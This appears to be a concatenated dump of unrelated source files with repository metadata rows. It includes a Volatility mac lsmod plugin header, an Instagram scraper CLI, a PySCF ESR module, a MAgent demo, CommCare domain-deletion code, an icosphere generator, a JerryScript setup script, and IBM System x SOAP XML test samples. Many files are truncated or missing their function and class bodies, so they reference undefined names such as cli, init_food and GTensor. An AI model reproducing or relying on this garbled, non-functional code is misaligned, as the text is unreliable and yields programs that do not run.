f.subplots_adjust(wspace=0)
plt.show()
| 36.808333 | 118 | 0.699796 |
fe5d25adf1fa45402acfda5811c79b3110e5df76 | 3,054 | py | Python | volatility3/framework/plugins/mac/lsmod.py | leohearts/volatility3 | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | [
"Linux-OpenIB"
] | null | null | null | volatility3/framework/plugins/mac/lsmod.py | leohearts/volatility3 | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | [
"Linux-OpenIB"
] | null | null | null | volatility3/framework/plugins/mac/lsmod.py | leohearts/volatility3 | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | [
"Linux-OpenIB"
] | null | null | null | # This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""A module containing a collection of plugins that produce data typically
found in Mac's lsmod command."""
from volatility3.framework import renderers, interfaces, contexts
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.objects import utility
from volatility3.framework.renderers import format_hints
| 34.704545 | 114 | 0.630321 |
fe5e44d3d94cf663368e7d42480218daf9100e40 | 16,722 | py | Python | instahunter.py | Araekiel/instahunter | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | [
"MIT"
] | 17 | 2020-09-06T18:10:51.000Z | 2021-12-04T07:04:00.000Z | instahunter.py | Araekiel/instahunter | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | [
"MIT"
] | 1 | 2020-09-30T18:43:10.000Z | 2021-05-17T09:59:03.000Z | instahunter.py | Araekiel/instahunter | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | [
"MIT"
] | 5 | 2020-11-10T15:08:37.000Z | 2022-01-02T21:20:24.000Z | '''
instahunter.py
Author: Araekiel
Copyright: Copyright 2019, Araekiel
License: MIT
Version: 1.6.3
'''
import click
import requests
import json
from datetime import datetime
headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"}
cli.add_command(getposts)
cli.add_command(getuser)
cli.add_command(getuserposts)
cli.add_command(search)
if __name__ == "__main__":
cli()
| 59.297872 | 425 | 0.57224 |
fe5f1c04bf52b3ba6d57139fe21bba52f39a4f4c | 6,901 | py | Python | pyscf/prop/esr/uks.py | azag0/pyscf | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | [
"Apache-2.0"
] | 2 | 2021-08-03T12:32:25.000Z | 2021-09-29T08:19:02.000Z | pyscf/prop/esr/uks.py | azag0/pyscf | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | [
"Apache-2.0"
] | null | null | null | pyscf/prop/esr/uks.py | azag0/pyscf | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | [
"Apache-2.0"
] | 2 | 2020-06-01T05:31:38.000Z | 2022-02-08T02:38:33.000Z | #!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling
(In testing)
Refs:
J. Phys. Chem. A. 114, 9246, 2010
Mole. Phys. 9, 6, 585, 1964
'''
from functools import reduce
import numpy, sys
from pyscf import lib
from pyscf.lib import logger
from pyscf.dft import numint
from pyscf.prop.nmr import uks as uks_nmr
from pyscf.prop.esr import uhf as uhf_esr
from pyscf.prop.esr.uhf import _write, align
from pyscf.data import nist
from pyscf.grad import rks as rks_grad
# Note mo10 is the imaginary part of MO^1
# Treat Vxc as one-particle operator Vnuc
# Jia, start to work here
if __name__ == '__main__':
from pyscf import gto, scf
mol = gto.M(atom='H 0 0.1 0; H 0 0 1.',
basis='ccpvdz', spin=1, charge=-1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
esr_obj = ESR(mf)
esr_obj.gauge_orig = (0,0,0)
esr_obj.para_soc2e = False
esr_obj.so_eff_charge = True
print(esr_obj.kernel())
mol = gto.M(atom='''
H 0 0 1
H 1.2 0 1
H .1 1.1 0.3
H .8 .7 .6
''',
basis='ccpvdz', spin=1, charge=1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
gobj = GTensor(mf)
#print(gobj.kernel())
gobj.para_soc2e = 'SSO'
gobj.dia_soc2e = None
gobj.so_eff_charge = False
nao, nmo = mf.mo_coeff[0].shape
nelec = mol.nelec
numpy.random.seed(1)
mo10 =[numpy.random.random((3,nmo,nelec[0])),
numpy.random.random((3,nmo,nelec[1]))]
print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05)
numpy.random.seed(1)
dm0 = numpy.random.random((2,nao,nao))
dm0 = dm0 + dm0.transpose(0,2,1)
dm10 = numpy.random.random((2,3,nao,nao))
dm10 = dm10 - dm10.transpose(0,1,3,2)
print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
| 36.707447 | 89 | 0.613534 |
fe5f635d76dff706767d5a4351544f241f8b385b | 3,192 | py | Python | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | 1 | 2021-06-22T10:22:26.000Z | 2021-06-22T10:22:26.000Z | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | null | null | null | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | null | null | null | import random
import magent
from magent.builtin.rule_model import RandomActor
import numpy as np
if __name__ == "__main__":
gw = magent.gridworld
cfg = gw.Config()
map_size = 25
cfg.set({"map_width": map_size, "map_height": map_size})
agent_group = cfg.add_group(
cfg.register_agent_type(
name="agent",
attr={
'width': 1,
'length': 1,
'view_range': gw.CircleRange(4),
'can_gather': True}))
food_group = cfg.add_group(
cfg.register_agent_type(
"food",
attr={'width': 1,
'length': 1,
'can_be_gathered': True}))
# add reward rule
a = gw.AgentSymbol(agent_group, index='any')
b = gw.AgentSymbol(food_group, index='any')
e = gw.Event(a, 'collide', b)
cfg.add_reward_rule(e, receiver=a, value=1)
# cfg.add_reward_rule(e2, receiver=b, value=1, die=True)
# cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1])
env = magent.GridWorld(cfg)
agent_handle, food_handle = env.get_handles()
model1 = RandomActor(env, agent_handle, "up")
env.set_render_dir("build/render")
env.reset()
upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2),
(map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2),
(map_size//2 + 2, map_size//2 + 2)]
# spawnrate = 0.1
env.add_agents(agent_handle, method="custom", pos=upstart)
# env.add_agents(rightgroup, method="custom", pos=rightstart)
init_food(env, food_handle)
k = env.get_observation(agent_handle)
print env.get_pos(agent_handle)
print len(env.get_pos(food_handle))
done = False
step_ct = 0
r_sum = 0
while not done:
obs_1 = env.get_observation(agent_handle)
ids_1 = env.get_agent_id(agent_handle)
acts_1 = model1.infer_action(obs_1, ids_1)
env.set_action(agent_handle, acts_1)
# simulate one step
done = env.step()
# render
env.render()
# get reward
reward = sum(env.get_reward(agent_handle))
r_sum += reward
# clear dead agents
env.clear_dead()
neigbor_regen_food(env, food_handle)
# print info
# if step_ct % 10 == 0:
# print("step %d" % step_ct)
step_ct += 1
if step_ct > 250:
break
print r_sum | 28 | 87 | 0.580201 |
fe605cdea9d8787846418bf36b3fc74d17111206 | 11,661 | py | Python | corehq/apps/domain/deletion.py | shyamkumarlchauhan/commcare-hq | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/domain/deletion.py | shyamkumarlchauhan/commcare-hq | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/domain/deletion.py | shyamkumarlchauhan/commcare-hq | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | [
"BSD-3-Clause"
] | null | null | null | import itertools
import logging
from datetime import date
from django.apps import apps
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Q
from dimagi.utils.chunked import chunked
from corehq.apps.accounting.models import Subscription
from corehq.apps.accounting.utils import get_change_status
from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type
from corehq.apps.domain.utils import silence_during_tests
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.userreports.dbaccessors import (
delete_all_ucr_tables_for_domain,
)
from corehq.apps.users.views.mobile import UserFieldsView
from corehq.blobs import CODES, get_blob_db
from corehq.blobs.models import BlobMeta
from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state
from corehq.form_processor.interfaces.dbaccessors import (
CaseAccessors,
FormAccessors,
)
from corehq.util.log import with_progress_bar
logger = logging.getLogger(__name__)
def _delete_domain_backend_mappings(domain_name):
model = apps.get_model('sms', 'SQLMobileBackendMapping')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_domain_backends(domain_name):
model = apps.get_model('sms', 'SQLMobileBackend')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_web_user_membership(domain_name):
from corehq.apps.users.models import WebUser
active_web_users = WebUser.by_domain(domain_name)
inactive_web_users = WebUser.by_domain(domain_name, is_active=False)
for web_user in list(active_web_users) + list(inactive_web_users):
web_user.delete_domain_membership(domain_name)
if settings.UNIT_TESTING and not web_user.domain_memberships:
web_user.delete()
else:
web_user.save()
# We use raw queries instead of ORM because Django queryset delete needs to
# fetch objects into memory to send signals and handle cascades. It makes deletion very slow
# if we have a millions of rows in stock data tables.
DOMAIN_DELETE_OPERATIONS = [
RawDeletion('stock', """
DELETE FROM stock_stocktransaction
WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s)
"""),
RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"),
RawDeletion('stock', """
DELETE FROM commtrack_stockstate
WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s)
"""),
ModelDeletion('products', 'SQLProduct', 'domain'),
ModelDeletion('locations', 'SQLLocation', 'domain'),
ModelDeletion('locations', 'LocationType', 'domain'),
ModelDeletion('stock', 'DocDomainMapping', 'domain_name'),
ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'),
ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'),
ModelDeletion('sms', 'SMS', 'domain'),
ModelDeletion('sms', 'SQLLastReadMessage', 'domain'),
ModelDeletion('sms', 'ExpectedCallback', 'domain'),
ModelDeletion('ivr', 'Call', 'domain'),
ModelDeletion('sms', 'Keyword', 'domain'),
ModelDeletion('sms', 'PhoneNumber', 'domain'),
ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'),
ModelDeletion('sms', 'MessagingEvent', 'domain'),
ModelDeletion('sms', 'QueuedSMS', 'domain'),
ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backend_mappings),
ModelDeletion('sms', 'MobileBackendInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backends),
CustomDeletion('users', _delete_web_user_membership),
CustomDeletion('accounting', _terminate_subscriptions),
CustomDeletion('form_processor', _delete_all_cases),
CustomDeletion('form_processor', _delete_all_forms),
ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'),
ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'),
ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'),
ModelDeletion('app_manager', 'ResourceOverride', 'domain'),
ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'),
ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'),
ModelDeletion('case_search', 'CaseSearchConfig', 'domain'),
ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'),
ModelDeletion('case_search', 'FuzzyProperties', 'domain'),
ModelDeletion('case_search', 'IgnorePatterns', 'domain'),
ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'),
ModelDeletion('consumption', 'DefaultConsumption', 'domain'),
ModelDeletion('data_analytics', 'GIRRow', 'domain_name'),
ModelDeletion('data_analytics', 'MALTRow', 'domain_name'),
ModelDeletion('data_dictionary', 'CaseType', 'domain'),
ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO
ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'),
ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'),
ModelDeletion('domain', 'TransferDomainRequest', 'domain'),
ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'),
CustomDeletion('export', _delete_data_files),
ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'),
ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'),
ModelDeletion('ota', 'SerialIdBucket', 'domain'),
ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'),
ModelDeletion('phone', 'SyncLogSQL', 'domain'),
ModelDeletion('registration', 'RegistrationRequest', 'domain'),
ModelDeletion('reminders', 'EmailUsage', 'domain'),
ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'),
ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'),
ModelDeletion('translations', 'SMSTranslations', 'domain'),
ModelDeletion('translations', 'TransifexBlacklist', 'domain'),
ModelDeletion('userreports', 'AsyncIndicator', 'domain'),
ModelDeletion('users', 'DomainRequest', 'domain'),
ModelDeletion('users', 'Invitation', 'domain'),
ModelDeletion('users', 'DomainPermissionsMirror', 'source'),
ModelDeletion('zapier', 'ZapierSubscription', 'domain'),
ModelDeletion('dhis2', 'Dhis2Connection', 'domain'),
ModelDeletion('motech', 'RequestLog', 'domain'),
ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'),
CustomDeletion('custom_data_fields', _delete_custom_data_fields),
CustomDeletion('ucr', delete_all_ucr_tables_for_domain),
]
| 41.646429 | 108 | 0.725924 |
fe609a5c6fba0b3499c6abf7b2ebbe251d3d8901 | 8,056 | py | Python | icosphere/icosphere.py | JackWalpole/icosahedron | 5317d8eb9509abe275beb2693730e3efaa986672 | [
"MIT"
] | 2 | 2017-10-02T23:36:49.000Z | 2021-12-21T06:12:16.000Z | icosphere/icosphere.py | JackWalpole/icosphere | 5317d8eb9509abe275beb2693730e3efaa986672 | [
"MIT"
] | null | null | null | icosphere/icosphere.py | JackWalpole/icosphere | 5317d8eb9509abe275beb2693730e3efaa986672 | [
"MIT"
] | null | null | null | """Subdivided icosahedral mesh generation"""
from __future__ import print_function
import numpy as np
# following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html
# hierarchy:
# Icosphere -> Triangle -> Point
def calculate_npts(level):
n = 2**level
return 2 + 10 * n**2
def calculate_nfaces(level):
n = 2**level
return 20 * n**2
def cart2geo(x, y, z):
"""convert x y z cartesian coordinates to latitude longitude radius
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
r = np.sqrt(x**2 + y**2 + z**2)
lon = np.rad2deg(np.arctan2(y,x))
lat = np.rad2deg(np.arcsin(z/r))
return lat, lon, r
def geo2cart(lat, lon, r):
"""convert latitude longitude radius to x y z cartesian coordinates
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
x = r * np.cos(lon) * np.cos(lat)
y = r * np.sin(lon) * np.cos(lat)
z = r * np.sin(lat)
return x, y, z
# def xyzToLatLonR(xyz):
# trans = np.array([np.])
| 37.64486 | 96 | 0.544067 |
fe60c7c64b76bb62e7927a82cb0d30249ff0793b | 1,840 | py | Python | src/main.py | Lidenbrock-ed/challenge-prework-backend-python | d2f46a5cf9ad649de90d4194d115cd9492eb583d | [
"MIT"
] | null | null | null | src/main.py | Lidenbrock-ed/challenge-prework-backend-python | d2f46a5cf9ad649de90d4194d115cd9492eb583d | [
"MIT"
] | null | null | null | src/main.py | Lidenbrock-ed/challenge-prework-backend-python | d2f46a5cf9ad649de90d4194d115cd9492eb583d | [
"MIT"
] | null | null | null | # Resolve the problem!!
import string
import random
SYMBOLS = list('!"#$%&\'()*+,-./:;?@[]^_`{|}~')
if __name__ == '__main__':
run()
| 27.058824 | 119 | 0.547283 |
fe6109edbf02869c5f97fef83d0ae614ddf0da76 | 8,091 | py | Python | targets/baremetal-sdk/curie-bsp/setup.py | ideas-detoxes/jerryscript | 42523bd6e2b114755498c9f68fd78545f9b33476 | [
"Apache-2.0"
] | 4,324 | 2016-11-25T11:25:27.000Z | 2022-03-31T03:24:49.000Z | targets/baremetal-sdk/curie-bsp/setup.py | ideas-detoxes/jerryscript | 42523bd6e2b114755498c9f68fd78545f9b33476 | [
"Apache-2.0"
] | 2,099 | 2016-11-25T08:08:59.000Z | 2022-03-12T07:41:20.000Z | targets/baremetal-sdk/curie-bsp/setup.py | lygstate/jerryscript | 55acdf2048b390d0f56f12e64dbfb2559f0e70ad | [
"Apache-2.0"
] | 460 | 2016-11-25T07:16:10.000Z | 2022-03-24T14:05:29.000Z | #!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fnmatch
import os
def build_soft_links(project_path, jerry_path):
""" Creates soft links into the @project_path. """
if not os.path.exists(project_path):
os.makedirs(project_path)
links = [
{ # arc
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'),
'link_name': 'arc'
},
{ # include
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'),
'link_name': 'include'
},
{ # quark
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'),
'link_name': 'quark'
},
{ # quark/jerryscript
'src': jerry_path,
'link_name': os.path.join('quark', 'jerryscript')
}
]
for link in links:
src = os.path.join(jerry_path, link['src'])
link_name = os.path.join(project_path, link['link_name'])
if not os.path.islink(link_name):
os.symlink(src, link_name)
print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name))
def find_sources(root_dir, sub_dir):
"""
Find .c and .S files inside the @root_dir/@sub_dir directory.
Note: the returned paths will be relative to the @root_dir directory.
"""
src_dir = os.path.join(root_dir, sub_dir)
matches = []
for root, dirnames, filenames in os.walk(src_dir):
for filename in fnmatch.filter(filenames, '*.[c|S]'):
file_path = os.path.join(root, filename)
relative_path = os.path.relpath(file_path, root_dir)
matches.append(relative_path)
return matches
def build_jerry_data(jerry_path):
"""
Build up a dictionary which contains the following items:
- sources: list of JerryScript sources which should be built.
- dirs: list of JerryScript dirs used.
- cflags: CFLAGS for the build.
"""
jerry_sources = []
jerry_dirs = set()
for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]:
for file in find_sources(os.path.normpath(jerry_path), sub_dir):
path = os.path.join('jerryscript', file)
jerry_sources.append(path)
jerry_dirs.add(os.path.split(path)[0])
jerry_cflags = [
'-DJERRY_GLOBAL_HEAP_SIZE=10',
'-DJERRY_NDEBUG',
'-DJERRY_DISABLE_HEAVY_DEBUG',
'-DJERRY_BUILTIN_NUMBER=0',
'-DJERRY_BUILTIN_STRING=0',
'-DJERRY_BUILTIN_BOOLEAN=0',
#'-DJERRY_BUILTIN_ERRORS=0',
'-DJERRY_BUILTIN_ARRAY=0',
'-DJERRY_BUILTIN_MATH=0',
'-DJERRY_BUILTIN_JSON=0',
'-DJERRY_BUILTIN_DATE=0',
'-DJERRY_BUILTIN_REGEXP=0',
'-DJERRY_BUILTIN_ANNEXB=0',
'-DJERRY_ESNEXT=0',
'-DJERRY_LCACHE=0',
'-DJERRY_PROPERTY_HASHMAP=0',
]
return {
'sources': jerry_sources,
'dirs': jerry_dirs,
'cflags': jerry_cflags,
}
def write_file(path, content):
""" Writes @content into the file at specified by the @path. """
norm_path = os.path.normpath(path)
with open(norm_path, "w+") as f:
f.write(content)
print("Wrote file '{0}'".format(norm_path))
def build_obj_y(source_list):
"""
Build obj-y additions from the @source_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list])
def build_cflags_y(cflags_list):
"""
Build cflags-y additions from the @cflags_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list])
def build_mkdir(dir_list):
""" Build mkdir calls for each dir in the @dir_list. """
return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list])
def create_root_kbuild(project_path):
""" Creates @project_path/Kbuild.mk file. """
root_kbuild_path = os.path.join(project_path, 'Kbuild.mk')
root_kbuild_content = '''
obj-$(CONFIG_QUARK_SE_ARC) += arc/
obj-$(CONFIG_QUARK_SE_QUARK) += quark/
'''
write_file(root_kbuild_path, root_kbuild_content)
def create_root_makefile(project_path):
""" Creates @project_path/Makefile file. """
root_makefile_path = os.path.join(project_path, 'Makefile')
root_makefile_content = '''
THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
T := $(abspath $(THIS_DIR)/../..)
PROJECT := {project_name}
BOARD := curie_101
ifeq ($(filter curie_101, $(BOARD)),)
$(error The curie jerry sample application can only run on the curie_101 Board)
endif
BUILDVARIANT ?= debug
quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig
arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig
# Optional: set the default version
VERSION_MAJOR := 1
VERSION_MINOR := 0
VERSION_PATCH := 0
include $(T)/build/project.mk
'''.format(project_name=project_name)
write_file(root_makefile_path, root_makefile_content)
def create_arc_kbuild(project_path):
""" Creates @project_path/arc/Kbuild.mk file. """
arc_path = os.path.join(project_path, 'arc')
arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk')
arc_sources = find_sources(arc_path, '.')
arc_kbuild_content = build_obj_y(arc_sources)
write_file(arc_kbuild_path, arc_kbuild_content)
def create_quark_kbuild(project_path, jerry_path):
""" Creates @project_path/quark/Kbuild.mk file. """
quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk')
# Extract a few JerryScript related data
jerry_data = build_jerry_data(jerry_path)
jerry_objects = build_obj_y(jerry_data['sources'])
jerry_defines = jerry_data['cflags']
jerry_build_dirs = build_mkdir(jerry_data['dirs'])
quark_include_paths = [
'include',
'jerryscript',
os.path.join('jerryscript', 'jerry-math', 'include'),
os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')
] + list(jerry_data['dirs'])
quark_includes = [
'-Wno-error',
] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths]
quark_cflags = build_cflags_y(jerry_defines + quark_includes)
quark_kbuild_content = '''
{cflags}
obj-y += main.o
{objects}
build_dirs:
{dirs}
$(OUT_SRC): build_dirs
'''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs)
write_file(quark_kbuild_path, quark_kbuild_content)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print('Usage:')
print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0]))
sys.exit(1)
project_name = 'curie_bsp_jerry'
file_dir = os.path.dirname(os.path.abspath(__file__))
jerry_path = os.path.join(file_dir, "..", "..", "..")
curie_path = os.path.join(os.getcwd(), sys.argv[1])
main(curie_path, project_name, jerry_path)
| 32.107143 | 113 | 0.66024 |
fe6124434f4049e2a32ac1bce2dbe6c619c4fd73 | 222 | py | Python | pythonteste/aula08a.py | genisyskernel/cursoemvideo-python | dec301e33933388c886fe78010f38adfb24dae82 | [
"MIT"
] | 1 | 2020-10-26T04:33:14.000Z | 2020-10-26T04:33:14.000Z | pythonteste/aula08a.py | genisyskernel/cursoemvideo-python | dec301e33933388c886fe78010f38adfb24dae82 | [
"MIT"
] | null | null | null | pythonteste/aula08a.py | genisyskernel/cursoemvideo-python | dec301e33933388c886fe78010f38adfb24dae82 | [
"MIT"
] | null | null | null | from math import sqrt
import emoji
num = int(input("Digite um nmero: "))
raiz = sqrt(num)
print("A raiz do nmero {0} {1:.2f}.".format(num, raiz))
print(emoji.emojize("Hello World! :earth_americas:", use_aliases=True))
| 31.714286 | 71 | 0.707207 |
fe619b4bba8137e17d2356d7038bb205bbb3ddcb | 8,074 | py | Python | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | quamilek/ralph | bf7231ea096924332b874718b33cd1f43f9c783b | [
"Apache-2.0"
] | null | null | null | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | quamilek/ralph | bf7231ea096924332b874718b33cd1f43f9c783b | [
"Apache-2.0"
] | null | null | null | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | quamilek/ralph | bf7231ea096924332b874718b33cd1f43f9c783b | [
"Apache-2.0"
] | null | null | null | macs_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetHostMacAddressesResponse</wsa:Action><wsa:RelatesTo>dt:1348742659504</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:111efb9a-f7d8-4977-8472-bcad40212a71</wsa:MessageID></s:Header><s:Body><GetHostMacAddressesResponse><HostMACaddress><HostMaddr><Description>Host Ethernet MAC Address 1</Description><Address>6E:F3:DD:E5:96:40</Address></HostMaddr><HostMaddr><Description>Host Ethernet MAC Address 2</Description><Address>6E:F3:DD:E5:96:42</Address></HostMaddr></HostMACaddress></GetHostMacAddressesResponse></s:Body></s:Envelope>
'''
memory_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetMemoryInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348742659500</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:dc560696-2ba4-4917-b7e7-1aac1983b727</wsa:MessageID></s:Header><s:Body><GetMemoryInfoResponse><Memory><MemoryInfo><Description>DIMM 2</Description><PartNumber>HMT351R7BFR4A-H9</PartNumber><SerialNumber>33b8a62f</SerialNumber><ManufactureDate>4511</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 3</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>b38aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 6</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>a78aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 9</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>b524042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 11</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>ba24042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 12</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>8e8aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 15</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>7feda482</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 18</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>d924042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo></Memory></GetMemoryInfoResponse></s:Body></s:Envelope>
'''
